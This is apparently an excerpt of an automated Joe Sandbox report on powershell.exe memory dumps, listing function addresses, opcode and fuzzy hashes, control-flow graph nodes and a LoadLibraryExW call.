                                                                              • Source File: 00000000.00000002.1788590405.00007FF887AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AD0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff887ad0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: d9e2812d27e8efc53c87284ab9a2a9a727d891003e3d22b3ff620a71f99d9fa4
                                                                              • Instruction ID: d84df00c2ac05ee4d175b07228fd156e048cc41aa18032e9e68f2b49c1ed71b0
                                                                              • Opcode Fuzzy Hash: d9e2812d27e8efc53c87284ab9a2a9a727d891003e3d22b3ff620a71f99d9fa4
                                                                              • Instruction Fuzzy Hash: 5701677115CB0C4FD744EF4CE451AA9B7E0FB95364F10056DE58AC3691DA36E881CB46
                                                                              Function 00007FF887ADFE40 Relevance: .0, Instructions: 42COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1788590405.00007FF887AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AD0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff887ad0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: af0f7862b2e59a7bd2404262fac94e53df7d1ab498351cc5f1ed2dd469106cfa
                                                                              • Instruction ID: 2bce967ccd11a1afb3881c2ae36a9c6d75e1d385556f1e13480140781d4dcb24
                                                                              • Opcode Fuzzy Hash: af0f7862b2e59a7bd2404262fac94e53df7d1ab498351cc5f1ed2dd469106cfa
                                                                              • Instruction Fuzzy Hash: 98F05E32B6CC1D5FD794F76C9419BAD22E1EFC9750B1941BAE00DC72EADD689C468380
                                                                              Function 00007FF887BA17DA Relevance: .0, Instructions: 34COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1789091323.00007FF887BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887BA0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff887ba0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: f75f445ef3aa106604dc9c8499488fb665db82575a6d3a73b11080fa900556b3
                                                                              • Instruction ID: 3e0f02a97f13ecc94aa1783bbc530824133b6ac997e6be045a4dd51aa78e4d63
                                                                              • Opcode Fuzzy Hash: f75f445ef3aa106604dc9c8499488fb665db82575a6d3a73b11080fa900556b3
                                                                              • Instruction Fuzzy Hash: 74F08C73E4EA9A0EEB92E6A8581A0BCABF1FB552A0B1801BAD019C7083ED185C558341
                                                                              Function 00007FF887AE450E Relevance: .0, Instructions: 9COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1788590405.00007FF887AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AD0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff887ad0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 9790d6a0f42f8e66dfbfe71e0974ada11858492f01c6cca2af00f54ce3ddcaaa
                                                                              • Instruction ID: 12941506b581cdb8979963e89b9bdadb6bd1fd32b345b1fb0fb48923090d6da8
                                                                              • Opcode Fuzzy Hash: 9790d6a0f42f8e66dfbfe71e0974ada11858492f01c6cca2af00f54ce3ddcaaa
                                                                              • Instruction Fuzzy Hash: 2DB01200A6DC2E05A48031D870022FCB1405B41560F810870E40C842C3DC4E19A2208B

                                                                              Execution Graph

                                                                              Execution Coverage:3.2%
                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                              Signature Coverage:0%
                                                                              Total number of Nodes:5
                                                                              Total number of Limit Nodes:0
                                                                              execution_graph 9327 7ff887af6d10 9328 7ff887af6d19 9327->9328 9329 7ff887af6cb3 LoadLibraryExW 9328->9329 9331 7ff887af6d2c 9328->9331 9330 7ff887af6cdd 9329->9330

                                                                              Executed Functions

                                                                              Function 00007FF887AF6D10 Relevance: 1.6, APIs: 1, Instructions: 136COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 215 7ff887af6d10-7ff887af6d17 216 7ff887af6d22-7ff887af6d2a 215->216 217 7ff887af6d19-7ff887af6d21 215->217 218 7ff887af6cb3-7ff887af6cdb LoadLibraryExW 216->218 219 7ff887af6d2c-7ff887af6d9d 216->219 217->216 221 7ff887af6ce3-7ff887af6d0a 218->221 222 7ff887af6cdd 218->222 225 7ff887af6da3-7ff887af6dae 219->225 222->221 226 7ff887af6db6-7ff887af6dd2 225->226 227 7ff887af6db0 225->227 227->226
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.1986840393.00007FF887AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AE0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_7ff887ae0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 027f72f7276c32c4c675a6f1de2ae0f185f302c0ac1f1ed5dcbaf0d2532f7f0c
                                                                              • Instruction ID: f31404f535c7a819dfa996f2508f123d49076bc99e82c3e883bb3ae43ff50e7b
                                                                              • Opcode Fuzzy Hash: 027f72f7276c32c4c675a6f1de2ae0f185f302c0ac1f1ed5dcbaf0d2532f7f0c
                                                                              • Instruction Fuzzy Hash: 9D41043190CA4C9FEB59DB98D446BE8BBF0FF56320F00422BD049C3552DB75A456CB91
                                                                              Function 00007FF887BB09F2 Relevance: 1.6, Strings: 1, Instructions: 382COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.1987619642.00007FF887BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887BB0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_7ff887bb0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 1A_L
                                                                              • API String ID: 0-1522723599
                                                                              • Opcode ID: 09c8ea59d01ac05696881f40b99c6a48715ec82400b5d877b60afdad3112c5f4
                                                                              • Instruction ID: 43432cc5b0c4f11da5907d2a8e4482104373ef125ce90319efc8be949099b43e
                                                                              • Opcode Fuzzy Hash: 09c8ea59d01ac05696881f40b99c6a48715ec82400b5d877b60afdad3112c5f4
                                                                              • Instruction Fuzzy Hash: 0BB12631A0DB894FEB99DA2C9454A787BF2FF66344B0802EEC849CB1A3D915EC45C781
                                                                              Function 00007FF887AF6C24 Relevance: 1.6, APIs: 1, Instructions: 116libraryCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 278 7ff887af6c24-7ff887af6c2b 279 7ff887af6c36-7ff887af6c9f 278->279 280 7ff887af6c2d-7ff887af6c35 278->280 283 7ff887af6ca1-7ff887af6ca6 279->283 284 7ff887af6ca9-7ff887af6cdb LoadLibraryExW 279->284 280->279 283->284 285 7ff887af6ce3-7ff887af6d0a 284->285 286 7ff887af6cdd 284->286 286->285
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.1986840393.00007FF887AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AE0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_7ff887ae0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID: LibraryLoad
                                                                              • String ID:
                                                                              • API String ID: 1029625771-0
                                                                              • Opcode ID: 75e8815061348f1566d5503c5f7f3c341098f7ca152a28e45cec9f228d5cca4b
                                                                              • Instruction ID: 6d1e0cc5bd8f30bdabe7a6dacd1b5be84c724d282a77204881346d50e55d92b0
                                                                              • Opcode Fuzzy Hash: 75e8815061348f1566d5503c5f7f3c341098f7ca152a28e45cec9f228d5cca4b
                                                                              • Instruction Fuzzy Hash: 0431D53190CA5C9FDB59DF98884ABE9BBF0FF66320F04422BD049D3152DB74A416CB91
                                                                              Function 00007FF887BB0A18 Relevance: 1.5, Strings: 1, Instructions: 254COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.1987619642.00007FF887BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887BB0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_7ff887bb0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 1A_L
                                                                              • API String ID: 0-1522723599
                                                                              • Opcode ID: f712a1dbe0a1112a22810fdab030642a616cfe053f0256396672b42f99bfb9c0
                                                                              • Instruction ID: a8fbf5bed07a994e1953cd2ff94ec12362190ece3a1d13dfebbc89907edca6ae
                                                                              • Opcode Fuzzy Hash: f712a1dbe0a1112a22810fdab030642a616cfe053f0256396672b42f99bfb9c0
                                                                              • Instruction Fuzzy Hash: 4171F631A0CE494FDB99EA2C949597937F2FF65354B1402BED809C71A2DE25EC42C781
                                                                              Function 00007FF887BB33DA Relevance: .4, Instructions: 450COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 339 7ff887bb33da-7ff887bb33df 340 7ff887bb3421-7ff887bb3464 339->340 341 7ff887bb33e1-7ff887bb33fa 339->341 346 7ff887bb346a-7ff887bb3474 340->346 347 7ff887bb36cc-7ff887bb374a 340->347 341->340 343 7ff887bb3397 341->343 344 7ff887bb3391-7ff887bb3393 343->344 345 7ff887bb3398-7ff887bb33cf 343->345 344->343 345->339 349 7ff887bb3476-7ff887bb3483 346->349 350 7ff887bb348d-7ff887bb3492 346->350 376 7ff887bb374c-7ff887bb3752 347->376 349->350 356 7ff887bb3485-7ff887bb348b 349->356 353 7ff887bb3670-7ff887bb367a 350->353 354 7ff887bb3498-7ff887bb349b 350->354 359 7ff887bb3689-7ff887bb36c9 353->359 360 7ff887bb367c-7ff887bb3688 353->360 357 7ff887bb34b2 354->357 358 7ff887bb349d-7ff887bb34b0 354->358 356->350 362 7ff887bb34b4-7ff887bb34b6 357->362 358->362 359->347 362->353 367 7ff887bb34bc-7ff887bb34c3 362->367 368 7ff887bb34c5-7ff887bb34cb 367->368 368->368 371 7ff887bb34cd 368->371 372 7ff887bb34cf-7ff887bb34d5 371->372 372->372 375 7ff887bb34d7-7ff887bb34f0 372->375 385 7ff887bb34f2-7ff887bb3505 375->385 386 7ff887bb3507 375->386 376->376 377 7ff887bb3754 376->377 379 7ff887bb3756-7ff887bb375c 377->379 379->379 380 7ff887bb375e-7ff887bb378b 379->380 387 7ff887bb3509-7ff887bb350b 385->387 386->387 387->353 390 7ff887bb3511-7ff887bb3519 387->390 390->347 391 7ff887bb351f-7ff887bb3529 390->391 392 7ff887bb3545-7ff887bb3555 391->392 393 7ff887bb352b-7ff887bb3543 391->393 392->353 397 7ff887bb355b-7ff887bb3562 392->397 393->392 398 7ff887bb3564-7ff887bb356a 397->398 398->398 399 7ff887bb356c 398->399 400 7ff887bb356e-7ff887bb3574 399->400 400->400 401 7ff887bb3576-7ff887bb358c 400->401 401->353 405 7ff887bb3592-7ff887bb3599 401->405 406 7ff887bb359b-7ff887bb35a1 405->406 406->406 407 7ff887bb35a3 406->407 408 7ff887bb35a5-7ff887bb35ab 407->408 408->408 409 7ff887bb35ad-7ff887bb35be 408->409 412 7ff887bb35c0-7ff887bb35e7 409->412 413 7ff887bb35e9 409->413 414 7ff887bb35eb-7ff887bb35ed 412->414 413->414 414->353 416 7ff887bb35f3-7ff887bb35fb 414->416 417 7ff887bb360b 416->417 418 7ff887bb35fd-7ff887bb3607 416->418 419 7ff887bb3610-7ff887bb3625 417->419 421 7ff887bb3627-7ff887bb362e 418->421 422 7ff887bb3609 418->422 419->421 424 7ff887bb3630-7ff887bb3636 421->424 422->419 424->424 425 7ff887bb3638-7ff887bb3646 424->425 427 7ff887bb3650-7ff887bb3656 425->427 428 7ff887bb365d-7ff887bb366f 427->428
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.1987619642.00007FF887BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887BB0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_7ff887bb0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: ea3b2b18cf7b97a96f533e27b04569be4f80dde81fa021b958496b73b73cbca0
                                                                              • Instruction ID: 30468a9d3fde0f80bac460889f725a9c31a5be59695e87e6a8a22a6d0130d949
                                                                              • Opcode Fuzzy Hash: ea3b2b18cf7b97a96f533e27b04569be4f80dde81fa021b958496b73b73cbca0
                                                                              • Instruction Fuzzy Hash: 28D13331E4DA8A4FE7A5EB6888556BD7BE2FF15390B0801BED94DC7183DE28A845C341
                                                                              Function 00007FF887BB3414 Relevance: .3, Instructions: 253COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 429 7ff887bb3414-7ff887bb3464 432 7ff887bb346a-7ff887bb3474 429->432 433 7ff887bb36cc-7ff887bb374a 429->433 434 7ff887bb3476-7ff887bb3483 432->434 435 7ff887bb348d-7ff887bb3492 432->435 459 7ff887bb374c-7ff887bb3752 433->459 434->435 440 7ff887bb3485-7ff887bb348b 434->440 438 7ff887bb3670-7ff887bb367a 435->438 439 7ff887bb3498-7ff887bb349b 435->439 443 7ff887bb3689-7ff887bb36c9 438->443 444 7ff887bb367c-7ff887bb3688 438->444 441 7ff887bb34b2 439->441 442 7ff887bb349d-7ff887bb34b0 439->442 440->435 446 7ff887bb34b4-7ff887bb34b6 441->446 442->446 443->433 446->438 450 7ff887bb34bc-7ff887bb34c3 446->450 451 7ff887bb34c5-7ff887bb34cb 450->451 451->451 454 7ff887bb34cd 451->454 455 7ff887bb34cf-7ff887bb34d5 454->455 455->455 458 7ff887bb34d7-7ff887bb34f0 455->458 468 7ff887bb34f2-7ff887bb3505 458->468 469 7ff887bb3507 458->469 459->459 460 7ff887bb3754 459->460 462 7ff887bb3756-7ff887bb375c 460->462 462->462 463 7ff887bb375e-7ff887bb378b 462->463 470 7ff887bb3509-7ff887bb350b 468->470 469->470 470->438 473 7ff887bb3511-7ff887bb3519 470->473 473->433 474 7ff887bb351f-7ff887bb3529 473->474 475 7ff887bb3545-7ff887bb3555 474->475 476 7ff887bb352b-7ff887bb3543 474->476 475->438 480 7ff887bb355b-7ff887bb3562 475->480 476->475 481 7ff887bb3564-7ff887bb356a 480->481 481->481 482 7ff887bb356c 481->482 483 7ff887bb356e-7ff887bb3574 482->483 483->483 484 7ff887bb3576-7ff887bb358c 483->484 484->438 488 7ff887bb3592-7ff887bb3599 484->488 489 7ff887bb359b-7ff887bb35a1 488->489 489->489 490 7ff887bb35a3 489->490 491 7ff887bb35a5-7ff887bb35ab 490->491 491->491 492 7ff887bb35ad-7ff887bb35be 491->492 495 7ff887bb35c0-7ff887bb35e7 492->495 496 7ff887bb35e9 492->496 497 7ff887bb35eb-7ff887bb35ed 495->497 496->497 497->438 499 7ff887bb35f3-7ff887bb35fb 497->499 500 7ff887bb360b 499->500 501 7ff887bb35fd-7ff887bb3607 499->501 502 7ff887bb3610-7ff887bb3625 500->502 504 7ff887bb3627-7ff887bb362e 501->504 505 7ff887bb3609 501->505 502->504 507 7ff887bb3630-7ff887bb3636 504->507 505->502 507->507 508 7ff887bb3638-7ff887bb3656 507->508 511 7ff887bb365d-7ff887bb366f 508->511
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.1987619642.00007FF887BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887BB0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_7ff887bb0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 893b35427b3b42dae143e073e0153abe96a94ebfb19fbc7722549004adf1a648
                                                                              • Instruction ID: 337425ee7b130ef649b6f967f2e06651b26cd9414bb3da410f4604796dd9835d
                                                                              • Opcode Fuzzy Hash: 893b35427b3b42dae143e073e0153abe96a94ebfb19fbc7722549004adf1a648
                                                                              • Instruction Fuzzy Hash: 6F81F331D9EA8A4FE7A6DA28485527D7AF2FF15390B5900BECA4DCB1C3DD18AC45C341